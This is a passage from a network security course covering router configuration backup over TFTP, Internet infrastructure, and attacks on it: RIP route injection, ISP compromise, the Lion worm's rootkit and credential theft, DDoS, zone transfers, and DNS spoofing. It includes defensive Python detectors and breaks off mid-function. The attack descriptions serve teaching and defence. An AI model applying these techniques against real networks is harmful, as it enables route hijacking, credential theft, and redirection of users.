Earlier in the Cisco router lesson, you looked at router configuration information. A router's running configuration (running-config) lives in RAM; the copy the router boots from (startup-config) is stored in NVRAM. These configuration files are typically uploaded to or retrieved from tftp servers somewhere on the network. A lot of work goes into configuring a production router. These configuration files, including any access lists, should be considered sensitive information; they also contain interface addressing, SNMP community strings, and password strings. As such, this information should be backed up to removable media and stored in a secure location. The typical method of backing up a configuration file is to upload it to a tftp server.

Cisco has a tftp server available for use on a Windows 9x/NT machine from their Web site at www.cisco.com/pcgi-bin/tablebuild.pl/tftp. You must accept the Software License Agreement before downloading the tftp server software. Other tftp servers are also available, such as the one from the SolarWinds Web site. Of course, you can simply implement the Remote Installation Service (RIS) for Windows 2000, then turn on the tftp daemon service to make your Windows 2000 Server into a tftp server, but this will work only on Windows 2000 Server. In order to implement the full-fledged RIS, you must have a Windows 2000 domain, but for the purposes of this exercise it does not matter; we just need RIS to be able to include the tftp service.

PGP: (Pretty Good Privacy) A freeware program primarily for secure electronic mail.

Once you have a tftp server, you can issue the appropriate commands on the Cisco router to upload its configuration information to the tftp server. After the file is uploaded, you can take it off the server and put it on a floppy disk for safekeeping. If you want to make this information more secure, you can encrypt the file by using PGP or any other encrypting tool. Keep in mind that tftp itself has no authentication and no encryption: anyone who can reach UDP port 69 on the server can read or write files in its root folder, and the configuration crosses the network in clear text. Run the tftp service only while you need it, and move the file off the server as soon as the copy completes. For the purposes of the subsequent tasks, you will implement the built-in tftp solution in Windows 2000 Server.

TASK 6D-24
Backing Up Cisco Router Configurations

Setup: You are logged in to Linux as root.

1. Log on to Windows 2000 Server as the renamed Administrator account.
2. Open the Add/Remove Programs Control Panel.
3. Click Add/Remove Windows Components, and wait for a few seconds.
4. Scroll down the list, check Remote Installation Services, and click Next.
5. When prompted, provide the path to the Windows 2000 installation files.
6. Click OK.
7. Click Finish, and then click Yes to restart the computer. Then, log back on to Windows 2000 as the renamed Administrator account.
8. From the Start menu, choose Programs→Administrative Tools→Services.
9. In the right pane, scroll down and look for the Trivial FTP Daemon service.
10. Right-click this service, and choose Start.
11. Close the Services console.
12. Open Windows Explorer.
13. Expand your boot partition. You should see a folder called tftpdroot. Double-click this folder. This is the folder where anyone tftp-ing to your server would place their files. Leave Explorer open.
14. Open a command prompt, and enter netstat -a to verify that your machine has UDP port 69 (tftp) open. You have just set up a tftp server.
15. Telnet to your router, or use SSH, if it is enabled.
   If you need to create user accounts for students, use the username command in a console session.
16. Switch to Enable Mode.
17. Enter copy ru tftp to begin copying the configuration file.
18. When prompted for the address or name of the remote host, enter your computer's IP address. Next, you will be prompted for a destination file name.
19. Press Enter to accept the default file name.
20. Wait a few seconds, and your configuration will be copied over to the tftp server.
21. Close the remote router session.
22. Switch to Explorer.
23. Verify that there is a file called left-config (or right-config, as the case may be) in the tftpdroot folder.
24. Double-click this file and open it in WordPad. You can see the router's entire configuration in this file. In a production environment, you would protect this file very carefully by moving it over to removable media and storing the media in a safe place.
25. Close all open windows.

Summary

In this lesson, you looked at various types of disasters that could befall an organization and put it out of commission, unless the organization had already implemented some form of business continuity planning. You looked at how such plans could be developed and tested. You looked at technologies to keep you powered on, backup strategies for operating systems, and products that can be used in various situations.

Lesson Review

6A Broadly speaking, what are the two types of disasters that can affect a business?
Natural disasters and man-made disasters.

List the two basic parts to a quantitative risk analysis.
The probability of a threat occurring and the estimated loss that will result from the threat.

6B What must be undertaken by a company before creating a contingency plan?
A risk analysis.

Before a contingency plan is put into effect, what must be done?
It must be tested.

What are the three types of tests that are typically carried out on a contingency plan?
Simulated testing on paper (or checklist test). Limited environment simulation (or structured walk-through test). Full-scale environment simulation (or full interruption test).

6C Voltage stabilizers can be used to combat what kind of electrical disturbances?
Spikes, surges, and sags.

Generators can be used to combat what kind of electrical disturbances?
Blackouts.

List at least three fuel types for conventional combustion-type electrical generators (other than diesel, propane, kerosene, and gasoline).
Responses might include CNG, LNG, methanol, and ethanol.

6D What is the minimum number of disks required to implement RAID 5?
Three.

What is the disk-utilization percentage for RAID 10?
50 percent.

List some of the requirements for a hot site:
Responses might include: Hot sites are practically a working replica of your server and client configurations. The company's uptime at the hot site should be achieved in a matter of hours, not days.

Broadly speaking, what are the three types of backups implemented by most system administrators?
Normal, differential, and incremental.

What is the essential difference between a differential backup and an incremental backup?
A differential backup does not mark the backed-up files as archived (it leaves the Archive bit set), while the incremental backup does (it clears the Archive bit). The Archive bit is the sixth bit in the attribute byte (value 0x20).

LESSON 7
Security on the Internet and the WWW

Overview
In this lesson, you will learn how to identify the issues associated with Internet and World Wide Web security. You will detail the major components of the Internet and their functions. Following a look at the components of the Internet, you will examine how hackers attack these components and how they target Web sites. The lesson ends by detailing the areas of Internet security that are related to individual users.

Data Files: simple.htm
Lesson Time: 4 hours

Objectives
In this lesson, you will:

7A Identify the major components of the Internet.
In this topic, you will identify the pieces of the Internet that are actually used to run the Internet and the organizations that govern them.

7B Identify the attack points on the Internet.
In this topic, you will identify the areas of the Internet where attacks have the highest probability and what those att attacks are likely to be.

7C Examine the attacks used against Web servers.
In this topic, you will examine the techniques used in attacks on Web servers and Web sites.

7D Identify risks that the Internet user faces.
In this topic, you will identify the techniques used to attack the users of the Internet, in contrast to attacks against the Internet itself.

Topic 7A
Describing the Components of the Internet

For us to have a valid discussion about the Internet and the World Wide Web, it is critical that you have solid knowledge of the components of the Internet. The major components that we will discuss are the Backbone and NAPs (Network Access Points), ISPs (Internet Service Providers), and DNS (Domain Name Service).

The Backbone (or Layer 1 of the Internet)

We know it as the Internet and the World Wide Web. The Internet is loosely defined by some as a packet-switched network of networks, not owned by any one country, government, or organization; rather, it is a voluntary-use network. The physical layer of the Internet itself involves many types of physical media (wired and wireless), and therefore, many types of access methods.

Two excellent Web sites that attempt to explain and illustrate the physical aspects of the Internet, along with myriad other issues surrounding the Internet's history and future, are www.cybergeography.com/ and www.telegeography.com/.

Components of the Internet Backbone

The Internet Backbone itself is a very high-speed interconnection of networks and has three major components: Network Service Providers, Long Distance Carriers, and Network Access Points.

The U.S. Portion of the Internet Backbone

Figure 7-1: A graphical representation of the Backbone over the United States. Picture courtesy of the National Center for Supercomputing Applications (NCSA).

Network Service Providers (NSPs)

Network Service Providers, sometimes called peering centers, are the actual organizations that provide the foundation level of the Internet Backbone. An NSP will provide national or international interconnecting Internet services to Regional Network Providers and to large Internet Service Providers, via Network Access Points. There are guidelines to be met for an organization to be considered an NSP, such as:

Minimum DS-3 bandwidth rates.
Three interconnection points to NAPs.
Routing of both ISO 8473 (CLNP) and IP packets.
Service availability of 99.92 percent uptime, with further requirements of no more than 7 hours per year of outage and a time to service restoration of 2.5 hours.

Long Distance Carriers

The Long Distance Carriers are the providers of the physical network of communication channels for the Internet and for voice/data applications. The general method would be for a NAP to contract with a Long Distance Carrier to provide the channels for backbone communication. Four major LDCs are listed below:

AT&T uses Frame Relay circuits at both DS-1 and DS-3 speeds, along with a hybrid Asynchronous Transfer Mode (ATM) network.
Sprint provides DS-1 and DS-3 speeds on its primarily fiber network. Sprint also uses FDDI for router interconnection.
WorldCom International, a division of MCI WorldCom, uses a fiber and digital microwave network to provide DS-1 and DS-3 speeds.
Hughes Network Systems provides backbone bandwidth via satellite communication.

NAPs

NAPs (Network Access Points) provide the actual means for the ISPs and NSPs to interconnect. The only restrictions on traffic flow are those that result from restrictions agreed between the ISPs and NSPs (or from legal requirements). ISPs and NSPs are required to have at least one bilateral agreement with a different ISP or NSP in order to attach to the NAP. In the United States, there are six major NAPs, known as Priority Network Access Points, and other non-priority NAPs:

Sprint, located in Pennsauken, NJ.
AmeriTech Advanced Data Services, located in Chicago, IL.
MFS Communications, located in Washington, DC; San Jose, CA; Dallas, TX; Frankfurt, Germany; and Paris, France.
PacBell, located in Los Angeles, CA, and San Francisco, CA.
Federal Internet Exchange, known as FIX-West.
Digital Internet Exchange, located in Palo Alto, CA.

ISPs at Work

When it comes to actual users connecting to the Internet, they need some type of local access. This is where the whole ISP (Internet Service Provider) system comes into focus. A common analogy for ISPs is that they are the providers of the dial tone for the Internet. With the ever-present mergers and acquisitions of ISPs, it is hard to keep up with all of the players. Instead, we will quickly look at the ISP system.

ISP Classifications

Clearly, not every ISP can have a direct connection to the Backbone; there would be too many connections, and the overall efficiency of the Internet would suffer greatly. Instead, there is a tiered system, where one ISP feeds off another. There are three levels of ISP, generally classified as follows:

- Tier One: These ISPs have their own nationwide backbone and connect to a NAP. They also have over 1,000,000 subscribers.
- Tier Two: These ISPs obtain their bandwidth from Tier One and have a local or regional backbone network. They have 50,000 subscribers and provide state or national service.
- Tier Three: These ISPs obtain their bandwidth from Tier Two and would provide local services only. They generally will have fewer than 50,000 users.

Just to be clear, there are no industry-agreed-upon guidelines on tier classification; these are for reference only.

Figure 7-2: A graphical representation of the ISP tier system and connections.


The Organizations that Help Run the Internet (or Layer 8 of the Internet)

For the Internet, there is no single management authority; instead, there are several groups involved in the infrastructure and management of the Internet. These organizations work together to ensure that the Internet remains operational and functions at the highest levels of available efficiency. The following are the main groups:

- Internet Engineering Task Force (IETF). The IETF is a large open international community of network designers, operators, vendors, and researchers concerned with the evolution of the Internet architecture and the smooth operation of the Internet. It is open to any interested individual.
- Internet Society (ISOC). The ISOC is a non-profit and nongovernmental professional organization that coordinates the usage of Internet applications and protocols. Membership to the ISOC is required.
- Internet Engineering Steering Group (IESG). The IESG is responsible for technical management of IETF activities and the Internet standards process. The IESG is directly responsible for the actions associated with entry into and movement along the Internet standards track, including final approval of specifications as Internet standards.
- Internet Architecture Board (IAB). The IAB is responsible for defining the overall architecture of the Internet, providing guidance and broad direction to the IETF. The IAB also serves as the technology advisory group to the ISOC and oversees a number of critical activities in support of the Internet.
- Internet Assigned Numbers Authority (IANA). The IANA, operating out of the University of Southern California, is chartered by the ISOC and the Federal Networking Council to function as the central coordinator for the assignment of IP addresses and management of the Root Domain Name Service.
- The Internet Corporation for Assigned Names and Numbers (ICANN). The ICANN, a non-profit corporation formed in 1998, presently assumes the following responsibilities: the IP address space allocation, protocol parameter assignment, DNS and root server system management, as well as management functions previously performed under U.S. Government contract by IANA and other entities.
- Network Information Centers (NIC). The NICs around the globe are organizations that perform Registry and Registrar functions associated with Domain Names.
- Council of Registrars (CORE). The CORE provides the international framework in which the policies for administration and enhancement of the Internet Domain Name Service are developed and implemented.

The chart shown in Figure 7-3 will help you understand the position of these different organizations according to the roles they play.

Figure 7-3: ICANN organizational chart.

DNS Revealed


Simple connection via an ISP may be enough to use the Internet, but for most users, they also want to experience the World Wide Web. Because the Web uses names, and the Internet uses numbers, there must be a translation between the two at some point along the way. This is where DNS comes in. Using flat-file databases maintained in Domain Name Servers around the world, users can browse around using names instead of numbers.

The organization that keeps track of all of the names and numbers associated with DNS is IANA. IANA acts as the central coordinator for assignment of IP addresses and manages the Root Domain Name Service. Additionally, there are three regional organizations around the world that assign IP addresses:

- ARIN: The American Registry for Internet Numbers operates in the Americas and sub-Saharan Africa.
- RIPE: The Réseaux IP Européens operates in North Africa and Europe.
- APNIC: The Asia-Pacific Network Information Center operates in Asia and Australia.

The DNS servers that provide the top level of name resolution are called the Root servers. There are currently 13 Root level DNS servers. Their names, locations, and IP addresses are shown in Figure 7-4.

Figure 7-4: A table of the Root DNS servers on the Internet.

Figure 7-5 shows the physical locations of the Root DNS servers on the Internet.

Figure 7-5: A map showing the physical locations of the Root DNS servers. Image from the World Internetworking Alliance (WIA), www.wia.org.

These Root servers are perhaps the most important systems today on the Internet. Root Servers A through M are maintained under control of the U.S. government. To prevent a single hacker exploit from compromising the entire system, the Root servers run different variations of UNIX as their operating systems. So critical is proper DNS operation to the global economy that most of these locations are secured under strict access methods, coupled with military-level control and armed guards present at all times. Recent attacks (such as the one in October 2002) via the Internet to try and cripple these servers failed to have a significant impact on the Internet because of the built-in redundancy. To increase fault tolerance, discussions are under way to populate the Internet with a few more Root servers, hosted in the Asia-Pacific region. To begin the process, Root Server F in California will be mirrored to a location in Asia so as to reach the largest possible Internet base of users.

fault tolerance: The ability of a system or component to continue normal operation despite the presence of hardware or software faults.

TASK 7A-1

Defining Internet Components

1. Discuss, with at least one other student, the principles of the Internet design.
2. After your discussion, diagram as much of the physical layout of the Internet as possible. Make your diagram as detailed as possible, including as many components as you can think of, only using this text for reference when necessary.

Topic 7B

Identifying the Weak Points of the Internet

So if the Internet servers are so well secured, and the ISP/NAP combinations have at least three connection points, the redundancy of the Internet seems to, by design, make hacking it a difficult task. To some this may be true, but to others it presents a challenge. So, where would a hacker attack? At what point is the Internet itself vulnerable? Hackers have several options, none of which are as easy as targeting a neighbor or small business down the street. Options of attack become the infrastructure itself, instead of a particular host or network.

Imagine this: There is a person who is trying to damage business X, a retail business. Business X has solid physical security inside, and people shop there no matter how loudly this person yells at them to stop. Out of frustration, one day he goes into the revolving door of business X and jams it so that it cannot revolve. He does this to all three revolving doors until there is no way in or out of business X. Did he compromise any internal systems, or even attempt to break into them? Not one. Has he damaged the business? Absolutely.

This is similar to the difficult issue of securing the infrastructure of the Internet. There are so many revolving doors, so to speak, that can become broken. It may not be necessary to actually get inside to be able to damage a mission-critical system.

hacking: Unauthorized use, or attempts to circumvent or bypass the security mechanisms of an information system or network.

Targeting the Routers

One of the potential targets of the Internet is the physical routers. These are the devices that carry the network information on the Backbone of the Internet. The Backbone routers function in a slightly different way from the everyday routers used in most organizations. The Backbone routers can be considered defaultless core routers, due to the fact that they do not hold any default routing data. Instead, Backbone routers use BGP (Border Gateway Protocol) to learn new routes dynamically. If an owner of an IP address changes local ISPs, the routes to this owner change. Most Backbone routers will accept BGP messages only from the largest Tier One ISPs. In the event that a Backbone router is found that will accept BGP information, this is where a hacker will attempt to inject false routing data into the tables. If the hacker is unable to inject false routing data, he or she may resort to DoS (Denial of Service) for the simple task of preventing the router from operating fully as designed.

An easier place for router attacks is not on the Internet itself, but in the local network routers. If a router is using RIP (Routing Information Protocol), a hacker can inject data into the routing tables with ease. RIP uses UDP packets for exchange of data and does not have any authentication mechanism built in. This means that any attacker can inject false routes into the routing tables. The false routes will then be propagated around the RIP network.

Figure 7-6: An example of some of the locations from which a hacker can inject RIP updates into a network.

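The following Python sensor is an added example, not part of the course text: it parses RIP responses as they would be captured on UDP port 520 and flags the conditions described above, namely an update from a router that is not a known neighbor, an update that carries no authentication entry (RIPv1 has none; RIPv2 can carry one, per RFC 2453 and RFC 2082), and an advertisement of a default route or of one of the classroom prefixes by an untrusted source. The router address 172.17.10.254, the rogue host 172.16.10.105, and the packet contents are constructed for the demonstration.

```python
"""Detection logic for RIP route injection: audit RIP responses seen on the wire.
Added example; packets and router addresses below are constructed, not captured."""
import struct
from ipaddress import IPv4Address, IPv4Network

AFI_IP, AFI_AUTH = 2, 0xFFFF
AUTH_SIMPLE, AUTH_MD5 = 2, 3      # RIPv2 authentication types (RFC 2453, RFC 2082)
RIP_RESPONSE = 2


def build_rip(version, routes, auth=None):
    """Construct a RIP response for the samples below.
    routes: [(prefix, metric)]; auth: None or (auth_type, data) for RIPv2."""
    pkt = struct.pack("!BBH", RIP_RESPONSE, version, 0)
    if auth is not None:
        # The authentication entry occupies the first 20-byte slot (AFI 0xFFFF).
        pkt += struct.pack("!HH", AFI_AUTH, auth[0]) + auth[1][:16].ljust(16, b"\x00")
    for prefix, metric in routes:
        net = IPv4Network(prefix)
        mask = int(net.netmask) if version == 2 else 0   # RIPv1 carries no mask
        pkt += struct.pack("!HHIIII", AFI_IP, 0, int(net.network_address), mask, 0, metric)
    return pkt


def classful_mask(addr):
    """RIPv1 is classful: infer the mask from the first octet."""
    if addr == 0:
        return "0.0.0.0"
    first = addr >> 24
    return "255.0.0.0" if first < 128 else "255.255.0.0" if first < 192 else "255.255.255.0"


def parse_rip(payload):
    """Parse a RIPv1/RIPv2 datagram into command, version, auth entry and routes."""
    if len(payload) < 4 or (len(payload) - 4) % 20:
        raise ValueError("malformed RIP packet")
    command, version = payload[0], payload[1]
    auth, routes = None, []
    for off in range(4, len(payload), 20):
        afi = struct.unpack("!H", payload[off:off + 2])[0]
        if afi == AFI_AUTH and off == 4:
            auth = {"type": struct.unpack("!H", payload[off + 2:off + 4])[0]}
            continue
        _tag, addr, mask, _nexthop, metric = struct.unpack("!HIIII", payload[off + 2:off + 20])
        mask_str = classful_mask(addr) if version == 1 else str(IPv4Address(mask))
        routes.append((IPv4Network((addr, mask_str), strict=False), metric))
    return {"command": command, "version": version, "auth": auth, "routes": routes}


def audit_update(src, payload, trusted_routers, managed_prefixes):
    """Return a list of findings for one RIP response received from src."""
    p = parse_rip(payload)
    findings = []
    if p["command"] != RIP_RESPONSE:
        return findings                        # requests carry no routes to inject
    if src not in trusted_routers:
        findings.append("update from unknown router %s" % src)
    if p["version"] == 1:
        findings.append("RIPv1 update: the protocol has no authentication")
    elif p["auth"] is None:
        findings.append("RIPv2 update without an authentication entry")
    elif p["auth"]["type"] == AUTH_SIMPLE:
        findings.append("RIPv2 update uses cleartext password authentication")
    for net, metric in p["routes"]:
        if net.prefixlen == 0:
            findings.append("default route advertised by %s" % src)
        elif src not in trusted_routers and any(net.overlaps(m) for m in managed_prefixes):
            findings.append("%s advertised %s, overlapping a managed prefix (metric %d)"
                            % (src, net, metric))
    return findings


# Constructed classroom data: the three subnets from the tasks, one hypothetical
# trusted router, and one hypothetical rogue host sending RIP updates.
TRUSTED_ROUTERS = {"172.17.10.254"}
MANAGED_PREFIXES = [IPv4Network(p) for p in ("172.16.10.0/24", "172.17.10.0/24", "172.18.10.0/24")]
LEGIT_UPDATE = build_rip(2, [("172.16.10.0/24", 1), ("172.18.10.0/24", 1)],
                         auth=(AUTH_MD5, b"\x00" * 16))   # auth fields zeroed as placeholders
ROGUE_UPDATE = build_rip(2, [("172.17.10.0/24", 1), ("0.0.0.0/0", 1)])

if __name__ == "__main__":
    for src, pkt in (("172.17.10.254", LEGIT_UPDATE), ("172.16.10.105", ROGUE_UPDATE)):
        print(src, audit_update(src, pkt, TRUSTED_ROUTERS, MANAGED_PREFIXES) or ["ok"])
```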

Targeting the ISPs


The way for a hacker to reach the maximum number of potential targets in the fastest amount of time is to hack into an ISP. By compromising an ISP, a hacker can have access to thousands of targets almost at once. This potential is overwhelming for some hackers, thus the ISP is their primary target. Often the hacker will not be trying to actually do any damage to the ISP itself, and he will try to remain as unnoticed as possible. The hacker is interested only in the user data. User names, passwords, and IP addresses can be compromised.

Targeting DNS

This is perhaps the biggest risk area of the Internet. Not technically a single point of failure, since the Root DNS servers run different versions of their operating systems on various hardware platforms in various physical locations, but nevertheless a strong target. There have been many issues of vulnerabilities with DNS over the years, with one of the most current being the BIND (Berkeley Internet Name Domain) attacks starting March 22, 2001.

On that day in March, IDS sensors all over the world were picking up massive requests to port 53 (DNS). A worm was soon found, named Lion, which used the BIND hole to attack the DNS servers. One single regional analysis of port 53 probes saw the number jump from 200 probes per day, prior to March 22, up to 50,000 probes on that day.

probe: Any effort to gather information about a machine or its users for the apparent purpose of gaining unauthorized access to the system at a later date.

The Lion Worm

The Lion worm is very similar to a different worm named Ramen; however, Lion was much more dangerous and needed to be taken seriously. It infected Linux machines with the BIND DNS server running. The BIND versions that were affected were 8.2, 8.2-P1, 8.2.1, and 8.2.2-Px, but BIND 8.2.3-REL and BIND 9 were not vulnerable.

The Lion worm was distributed via an application called pscan. randb would follow by generating random class B networks, probing TCP port 53. After a system was targeted, it would next check to see if that system was vulnerable. In the event that a vulnerable system was identified, a system exploit was executed, and the t0rn rootkit was installed. Once the rootkit was installed, it sent off the contents of /etc/passwd and /etc/shadow, along with some network settings, to an address in the china.com domain. It would then delete /etc/hosts.deny, lowering some of the built-in protection afforded by TCP wrappers. Ports 60008/tcp and 33567/tcp were given a backdoor root shell (via inetd, see /etc/inetd.conf), and a Trojaned version of SSH would be placed on 33568/tcp. Syslogd would then be killed, so the logging on the system could no longer be considered trusted. To continue, a Trojaned version of login would then be installed. The Trojan would enable looking for a hashed password in /etc/ttyhash. /usr/sbin/nscd (the optional Name Service Caching daemon) would finally be overwritten with a Trojaned version of SSH. So, does this strike you as a serious threat? It better! All of this would be possible, simply by locating DNS servers running the correct versions of BIND. This is an example of attacking the infrastructure directly.

rootkit: A hacker security tool that captures passwords and message traffic to and from a computer. A collection of tools that allows a hacker to provide a back door into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkit is a classic example of Trojan Horse software. Rootkit is available for a wide range of operating systems.


DDoS of the Internet

Instead of launching a specific attack against the DNS system, a hacker can target DNS via a DDoS (Distributed Denial of Service). By launching a DDoS attack against DNS servers, no true data can be exchanged. The end result of this is that DNS servers will not be able to update their DNS entries, and host-name resolution may cease for those servers' clients.

DDoS takes advantage of the inherent communication channels of the Internet. In order for us to communicate, we must have open channels. If those channels were to fill with useless information, then when we need to communicate, there would be no open channels to do so. This is essentially the function of DDoS. One of the main tools used in DDoS attacks is called TFN2K, or Tribe Flood Network 2000. TFN2K has the ability to flood the network with TCP, UDP, or ICMP packets (or a mix of all three at the same time). Additionally, TFN2K can spoof the source IP address, making for difficult investigative work in response to an attack. If a hacker is going to go after the serious infrastructure of the Internet, there is no better choice than DNS itself.

Figure 7-7: A graphical example of the position of elements for a simple DoS attack.


TASK 7B-1

Identifying Weak Points of the Internet

1. Using your diagram from Task 7A-1 for reference, identify the points of attack of the Internet, and the methodologies that could be used to attack these points.
2. List the possible attack points and methods you have defined.

DNS Security

Because the DNS servers are perhaps the most critical component of the Internet, their security is paramount. There are several different areas in which attackers commonly will go after a DNS server. They are pulling Zone Transfer traffic and DNS Spoofing.

Zone Transfers

When it comes to DNS and security on the Internet, one of the first issues to address is the issue of Zone Transfer traffic. Zone Transfer traffic is the name of the data sent from a DNS server that is responsible for an area, or zone, to a secondary server that will assist with name resolution. The reason this is critical, from a security perspective, is that in this transfer traffic are names of computers and their IP addresses. Additionally, depending on the configuration of the master DNS server, the data is likely to include the type of machine, such as a mail server. So, if an attacker is trying to identify the targets in a particular network, the zone transfer traffic may identify all the machines.

Where this is most important is the DNS server that provides name resolution to both public and private addresses. In the event an attacker is able to get the zone transfer traffic of this DNS server, the attacker will have the entire internal network mapped, by hostname, IP address, and some services.

There are two basic types of Zone Transfer traffic. The first is called All-zone, and this transfer is when all the names that the master DNS server is aware of are sent to the secondary DNS server; in other words, everything the DNS server knows about name resolution. In the DNS server, this is called an AXFR transfer. The second type of transfer is called an Incremental transfer. The Incremental transfer, instead of containing all that a DNS server knows, will contain only that information that is new or changed since the last transfer. This is a more efficient way of exchanging zone data. In the DNS server, this is called an IXFR transfer.

So an attacker may pretend to be a legitimate secondary DNS server and request the master DNS to transfer the zone information. For this reason, it is strongly advised that all master DNS servers are configured to allow transfer traffic to go only to authorized secondary DNS servers.
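As an added example, not from the course text, the Python below reads a zone file in the text format that the Windows 2000 DNS server writes to \WINNT\System32\dns (the same records a secondary receives in an AXFR) and summarises what an unrestricted zone transfer would hand to an outsider: every host name with its address, plus the mail and name servers. The studentr03.edu zone contents and its addresses are constructed in that style, not taken from a real server.

```python
"""What a zone transfer reveals: parse an RFC 1035-style zone file and list the
hosts and service roles it exposes. Added example; the zone text is constructed."""

# Constructed in the style of a Windows 2000 DNS zone file (studentr03.edu.dns).
SAMPLE_ZONE = """\
;
;  Database file studentr03.edu.dns for studentr03.edu zone.
;      Zone version:  3
;
@                       IN  SOA stu-w2k-r03.studentr03.edu.  hostmaster.studentr03.edu. (
                        3            ; serial number
                        900          ; refresh
                        600          ; retry
                        86400        ; expire
                        3600       ) ; minimum TTL
;
;  Zone NS records
;
@                       NS  stu-w2k-r03.studentr03.edu.
;
;  Zone records
;
stu-w2k-r03             A   172.18.10.3
testhost                A   192.168.10.101
mail                    A   192.168.10.25
@                       MX  10 mail.studentr03.edu.
"""


def qualify(name, origin):
    """Turn an owner or target name into a fully qualified, lower-case name."""
    if name == "@":
        return origin
    if name.endswith("."):
        return name.rstrip(".").lower()
    return "%s.%s" % (name.lower(), origin)


def parse_zone_file(text, zone):
    """Return [(owner, rtype, [rdata tokens])] for every record in the file."""
    origin = zone.rstrip(".").lower()
    records, owner, pending, depth = [], "@", [], 0
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()        # strip comments
        if not line.strip():
            continue
        depth += line.count("(") - line.count(")")  # multi-line records (SOA)
        pending.append(line)
        if depth > 0:
            continue
        logical, pending = " ".join(pending), []
        tokens = logical.replace("(", " ").replace(")", " ").split()
        if tokens[0].startswith("$"):               # $ORIGIN / $TTL directives
            if tokens[0].upper() == "$ORIGIN":
                origin = tokens[1].rstrip(".").lower()
            continue
        if not logical[0].isspace():                # leading blank means "same owner as above"
            owner = tokens.pop(0)
        while tokens and (tokens[0].isdigit() or tokens[0].upper() == "IN"):
            tokens.pop(0)                           # optional TTL and class
        records.append((qualify(owner, origin), tokens[0].upper(), tokens[1:]))
    return records


def exposure_report(records):
    """Summarise what an AXFR of these records gives away."""
    hosts = sorted((name, rd[0]) for name, rtype, rd in records if rtype == "A")
    return {
        "hosts": hosts,
        "mail_servers": [rd[-1].rstrip(".").lower() for _, rtype, rd in records if rtype == "MX"],
        "name_servers": [rd[0].rstrip(".").lower() for _, rtype, rd in records if rtype == "NS"],
    }


if __name__ == "__main__":
    report = exposure_report(parse_zone_file(SAMPLE_ZONE, "studentr03.edu"))
    for key, value in report.items():
        print(key, value)
```

Everything in the report is what a transfer to an unauthorized requester would disclose, which is the reason the tasks below restrict transfers with Only To The Following Servers.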

DNS Spoofing

Companies that do all of their business on the Internet must be vigilant in the protection of their Web sites. However, for most organizations, the ability to protect the Web site stops at the Web site. Generally, the organization does not have control over the ISP, the routers, or the DNS of the Internet. What would happen if the DNS server that is used to identify the organizational Web site were to suddenly point to the wrong Web site? This type of thing has happened, and it is something that an organization must watch out for. The ability to redirect a DNS server to point a client to an incorrect resource is very serious. Imagine that an attacker had taken the time to pull every page from the organization's Web site, could re-create the site in its entirety, and was to redirect legitimate requests for this Web site to the cloned site that the attacker is running. If this Web site takes credit card numbers, it becomes a very serious situation. There are several different methods of DNS spoofing:

- DNS Cache Poisoning. In DNS Cache Poisoning, an attacker sends fake mapping information to the DNS server, and the server enters this false name information as legitimate DNS data. When a client asks the DNS server to resolve a name that has been falsely entered in the DNS server, there is no way for the client to know that the information is incorrect. By doing this, the attacker is able to send the client to an incorrect machine.
- Spoofing the DNS Response. In Spoofing the DNS Response, the attacker sits between the DNS client and the legitimate DNS server. When the attacker notices a DNS request on the wire, a false response is sent to the client (from the attacker) before the legitimate DNS server can reply. By doing this, the attacker is sending the client to an incorrect machine.
- DNS Server Compromise. The third spoofing option is for complete DNS Server Compromise. In this case, the attacker has taken control of a legitimate DNS server and has directly inputted false data. The client makes a DNS request to the server, and the server replies just as it is designed to do.

The danger of a DNS server that has been compromised, combined with a duplicated Web site that requests credit card data, should be very obvious by now. One thing to maintain, as an organization, is careful logging and monitoring of Web traffic. In the event that all traffic stops, this may be cause for alarm.

DNS spoofing: Assuming the DNS name of another system by either corrupting the name service cache of a victim system, or by compromising a domain name server for a valid domain.

Configuring DNS for Windows 2000

In the following set of tasks, you will install and configure DNS servers. First, your instructor will configure a DNS server on the instructor machine. This will be the Standard Primary Server. Watch the steps carefully as the instructor performs them. Next, the instructor will create Reverse Lookup Zones for the Left, Center, and Right subnets, matching the subnets in your classroom layout. Your instructor will also create one Forward Lookup Zone called scnpdns.edu for the whole class. You will later configure your machines to be Secondary DNS Servers to this Primary Server.

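Before the classroom tasks, here is an added example, not part of the course text, showing the checks a resolver applies to a reply so that the first two spoofing methods described above (a forged response and a poisoned record) are not accepted: the reply must come from the server that was queried, echo the transaction ID and question, and carry only records inside the zone that server answers for. The query for STU-W2K-L01 in scnpdns.edu, the replies, and the addresses are constructed from the classroom layout; nothing here is captured traffic.

```python
"""Resolver-side checks against spoofed DNS replies. Added example; the query,
replies and addresses are constructed from the classroom layout, not captured."""
import struct

TYPE_A, CLASS_IN = 1, 1
FLAG_QR = 0x8000


def encode_name(name):
    """Wire-encode a domain name as length-prefixed labels."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # compression pointer
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels).lower(), (end if jumped else off)


def build_query(tx_id, qname):
    """Standard recursive A query, as a stub resolver would send it."""
    return (struct.pack("!HHHHHH", tx_id, 0x0100, 1, 0, 0, 0) + encode_name(qname)
            + struct.pack("!HH", TYPE_A, CLASS_IN))


def build_reply(tx_id, qname, answers):
    """Reply carrying A records [(owner, ipv4)]; used only to construct samples."""
    msg = struct.pack("!HHHHHH", tx_id, 0x8180, 1, len(answers), 0, 0)
    msg += encode_name(qname) + struct.pack("!HH", TYPE_A, CLASS_IN)
    for owner, ip in answers:
        rdata = bytes(int(o) for o in ip.split("."))
        msg += encode_name(owner) + struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4) + rdata
    return msg


def parse_message(msg):
    """Parse header, question section and all resource records of a DNS message."""
    tx_id, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, records = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an + ns + ar):
        name, off = decode_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
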